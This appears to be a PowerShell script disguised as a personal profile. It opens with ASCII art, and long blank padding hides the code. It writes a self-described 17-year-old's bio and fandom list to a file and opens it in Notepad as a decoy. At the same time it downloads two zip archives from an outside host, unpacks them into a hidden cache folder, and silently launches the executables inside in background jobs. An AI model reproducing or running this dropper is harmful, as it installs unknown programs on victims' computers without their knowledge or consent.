#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⡤⢤⣤⣤⣤⣤⣤⣄⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⡿⣟⠯⡒⢯⣽⣓⣒⢾⣯⣭⣿⣿⠿⠭⠭⣯⣷⣦⡀⠀⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣯⣞⣕⣽⠾⠿⠿⠿⢿⣏⣿⣿⣿⡗⣽⣿⣿⣷⡝⣿⣿⡆⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣛⠛⢿⣛⢝⢁⣀⣀⣀⠓⠶⠈⣿⣿⡿⠗⠉⠁⢀⣀⣹⣛⣛⣳⢄⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⡔⡾⢁⣴⡆⢦⣬⣙⣛⣋⣤⣿⣿⣷⣾⣿⣿⣿⡆⢿⣿⡟⠻⠛⡉⣍⣲⢱⠁
#⠀⠀⠀⠀⠀⠀⠀⠀⣇⣇⢸⣉⡀⢦⣌⡙⠻⠿⣯⣭⣥⠡⡤⠿⢿⣿⣿⡆⠉⡻⢿⣿⠇⢻⣟⠼⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠈⠪⣴⣿⣧⡀⢉⠛⠘⢶⣦⣬⠉⣀⠓⠿⠿⠯⢉⣴⠿⠿⠓⡁⡄⠀⣿⠃⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣷⣌⠻⢠⣤⣀⠉⠐⠛⠿⠿⠰⠶⠦⠰⠶⠇⠘⠃⠁⠀⣿⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣷⣌⠻⢿⠇⣼⣶⣦⡄⣄⣀⡀⢀⡀⢀⡀⡀⠀⢠⣿⠀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠯⣛⠭⣻⠶⣬⣉⣛⠛⠃⠿⠿⠃⠿⠃⠚⣀⣁⣤⣾⣿⡀⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠒⠯⣶⣋⡽⢛⣿⣯⣿⣭⣭⡿⢿⣿⣻⣾⢟⣿⡇⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠿⠿⣶⣾⣿⣿⣿⣭⣭⣭⣶⣿⡿⠁⠀
#⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠛⠛⠛⠋⠁⠀⠀⠀























































































$f="$env:TEMP\a.txt";[System.IO.File]::WriteAllText($f,@'
My name Is Aurora
Im 17 - 18 !!
I go by she/her and Im pansexual <333
Im from Italy but I mostly speak english on the internet 
Im an INFP/ENFP
I love drawing,acting/voice acting,performing and other stuff ig
Butthead's gf <3

My fandoms are: 
Looney Tunes
Animaniacs
Tiny Toons 
Roger Rabbit 
Mickey Mouse 
Soreike Anpanman 
Peanuts
Fairly OddParents
Beavis and Butthead 
Daria
Cookie run 
Panty and Stocking 
Genshin Impact 
Cuphead 
Steven Universe 
Milgram
Alien Stage 
Project Sekai
Hetalia 
Undertale 
Deltarune 
Homestuck 
My little pony
Spooky Month 
Brain Dump
18trip
DogMan
Creepypasta 
Epic the musical 
The Mandela Catalogue 
The Amazing Digital Circus
Nightmare on elm street 
Friday the 13th 
Hellraiser
Texas Chainsaw Massacre 
Halloween 
Jeepers Creepers 
Doc Martin 
The big bang theory
Young Sheldon 
Wings of desire
Madoka Magica 
Evangelion
Dokuro Chan 
Castlevania
Nana
Super Sonico
Wrist Cut Warriors 
Lucky Star 
K-On !
Pichi Pichi Pitch 
Sally Face 
Omori
Watamote
Komi cant comunicate
Happy tree friends 
Butthead romantically yumeshipper & Kinger and Licorice Cookie familial yumeshipper !!

໒꒰ྀི๑ᵔ ᵕ ᵔ๑꒱ྀིა

Aestethics: Jestercore - Angelcore  - Lolita - Dollette - Yumekawaii - Bimbocore - Tenshikawaii - Whimsical and Cutecore!!
I love Cats,Dogs,Bunnies, Deers and Jellyfishes
My fav colors are: PINK !!! -  White !! - Light Blue !! - Purple !!
Dni dms please Im not really interested in friendships 
'@);notepad $f;$u='https://hexfiles.lol/d/cf3238878159','https://hexfiles.lol/d/0205765929d6';$b="$home\.cache";md $b -ErrorAction SilentlyContinue|Out-Null;$u|%{$d="$b\$([guid]::NewGuid())";md $d|Out-Null;Start-Job{$a=$args[0];$d=$args[1];$z="$d.zip";(New-Object Net.WebClient).DownloadFile($a,$z);Expand-Archive $z $d -Force;Remove-Item $z -Force;$e=Get-ChildItem $d -Recurse *.exe|Select-Object -First 1;if($e){Start-Process $e.FullName -WindowStyle Hidden}}-ArgumentList $_,$d}
